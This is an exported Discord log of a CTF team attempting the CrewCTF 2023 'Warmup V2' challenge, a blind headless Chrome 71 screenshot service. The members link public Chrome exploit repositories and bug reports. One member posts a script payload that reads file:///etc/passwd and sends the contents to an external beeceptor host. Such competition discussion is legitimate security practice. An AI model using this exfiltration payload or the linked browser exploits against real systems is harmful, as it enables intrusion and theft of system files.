Guild icon
Project Sekai
🔒 CrewCTF 2023 / ❌-pwn-warmup-v2
Avatar
Sutx BOT 07/07/2023 11:00 PM
Warmup V2 - 1000 points
Category: Pwn Description: Let's Warmup again! hehe Notes: No file given on this time nc 35.189.210.103 18001 Files: No files. Tags: No tags.
07/07/2023 11:00 PM
Sutx pinned a message to this channel. 07/07/2023 11:00 PM
Avatar
Sutx BOT 07/07/2023 11:02 PM
@nyancat0131 wants to collaborate 🤝
Avatar
Sutx BOT 07/07/2023 11:55 PM
@Surg wants to collaborate 🤝
Avatar
Surg 07/08/2023 12:00 AM
ok, when its not dead
00:00
it takes a link and takes a "screenshot"
00:01
youtube not exclusive, im trying a webhook link rn
Avatar
Sutx BOT 07/08/2023 12:06 AM
@Zafirr wants to collaborate 🤝
Avatar
Surg 07/08/2023 12:07 AM
its a little dead rn
Avatar
Zafirr 07/08/2023 12:16 AM
yeah
Avatar
Surg 07/08/2023 1:14 AM
ok i had it make a req https://webhook.site/#!/cf18b281-dae1-4d8e-845c-6fee406c1b8c/64aa62e7-2f3b-41c6-9bc7-9bff214b23f6/1
Webhook.site - Test, process and transform emails and HTTP requests
Instantly generate a free, unique URL and email address to test, inspect, and automate (with a visual workflow editor and scripts) incoming HTTP requests and emails
01:15
im not entirely sure what it wants us to do blind here
Avatar
Zafirr 07/08/2023 1:28 AM
yeah idk either
Avatar
sahuang 07/08/2023 1:39 AM
they updated description right
Avatar
Surg 07/08/2023 1:40 AM
yeah tho we already figured that part out...
Avatar
sahuang 07/08/2023 1:41 AM
oof
Avatar
Surg 07/08/2023 1:41 AM
it just makes a normal looking GET request from the site
01:41
idk if I (someone) should try and set up some webserver to see if it has more interesting repsonses if there's data to pull
01:41
binaryless pwn sucks
Avatar
Zafirr 07/08/2023 1:42 AM
it runs javascript
01:42
im seeing if i can read file://flag.txt
Avatar
Zafirr 07/08/2023 2:28 AM
cant even read /etc/passwd (edited)
02:29
i'll try again later
Avatar
Sutx BOT 07/08/2023 2:56 AM
@rubiya wants to collaborate 🤝
Avatar
nyancat0131 07/08/2023 2:57 AM
can we XHR?
Avatar
Zafirr 07/08/2023 2:57 AM
what is xhr
Avatar
rubiya 07/08/2023 2:57 AM
GET /x HTTP/1.1 Host: rubiya.kr:31337 Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/71.0.3542.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate
Avatar
nyancat0131 07/08/2023 2:57 AM
making a request haha
Avatar
rubiya 07/08/2023 2:57 AM
chrome is 71
Avatar
Zafirr 07/08/2023 2:58 AM
<script>fetch("file:///etc/passwd") .then((res) => res.text()) .then((text) => { window.location="https://asdfasdfasdf.free.beeceptor.com/" + text }) .catch((e) => { window.location="https://asdfasdfasdf.free.beeceptor.com/" + e })</script>
02:58
this is what i tried
Avatar
nyancat0131 07/08/2023 2:58 AM
chrome 71 huh
02:58
maybe oneday?
Avatar
Zafirr 07/08/2023 2:58 AM
maybe
Avatar
nyancat0131 07/08/2023 3:03 AM
https://bugs.chromium.org/p/chromium/issues/detail?id=905940
Avatar
rubiya 07/08/2023 3:04 AM
https://github.com/ZwCreatePhoton/CVE-2019-5782_CVE-2019-13768
Avatar
nyancat0131 07/08/2023 3:04 AM
https://bugs.chromium.org/p/chromium/issues/detail?id=906043
03:05
i think 5782 is good enough
03:05
inside the report
03:05
there's code too
Avatar
rubiya 07/08/2023 3:06 AM
not sure works in linux
Avatar
nyancat0131 07/08/2023 3:10 AM
do we need sbx though
03:10
since no binary
03:11
i doubt we would need sbx
Avatar
nyancat0131 07/08/2023 3:23 AM
I think
03:23
if it's stable release
03:23
then we got the binary
03:23
just need to pwn it...
03:24
but i dunno if we need sbx if we have to do that
03:27
https://commondatastorage.googleapis.com/chromium-browser-snapshots/index.html?prefix=Linux_x64/588439/
Avatar
nyancat0131 07/08/2023 4:35 AM
maybe someone with browser knowledge can try to pwn it
Avatar
Zafirr 07/08/2023 4:58 AM
sbx == sandbox escape?
Avatar
nyancat0131 07/08/2023 5:00 AM
ye
05:00
but i cant find a poc that can spawn shell on --no-sandbox yet
05:00
so someone if have skill can try it
05:00
i provided the binary
05:00
pretty sure this is the one
Avatar
Zafirr 07/08/2023 5:28 AM
ill try again later
Avatar
Sutx BOT 07/08/2023 5:37 AM
@irogir wants to collaborate 🤝
Avatar
Zafirr 07/08/2023 7:45 PM
im too lazy to do this one
19:45
it should just be a 1 day
19:45
peepoo
Avatar
Sutx BOT 07/08/2023 9:42 PM
@snwo wants to collaborate 🤝
Avatar
Zafirr 07/08/2023 9:57 PM
nothing is working
Avatar
snwo 07/08/2023 10:24 PM
Image attachment
22:24
cve-2019-7582 seems not work (edited)
Avatar
nyancat0131 07/08/2023 10:25 PM
https://github.com/o0xmuhe/headless_chrome_demo/tree/main
GitHub - o0xmuhe/headless_chrome_demo
Contribute to o0xmuhe/headless_chrome_demo development by creating an account on GitHub.
Thumbnail
22:25
one of these might work
22:26
i rmb getting crash
22:26
also the math.expm (-0) bug still works as well
Avatar
snwo 07/08/2023 10:26 PM
lol
22:29
[*] corrupt_buffer.backing_store : 0x3ff199999999999a
Avatar
nyancat0131 07/08/2023 10:32 PM
xd
Exported 73 message(s)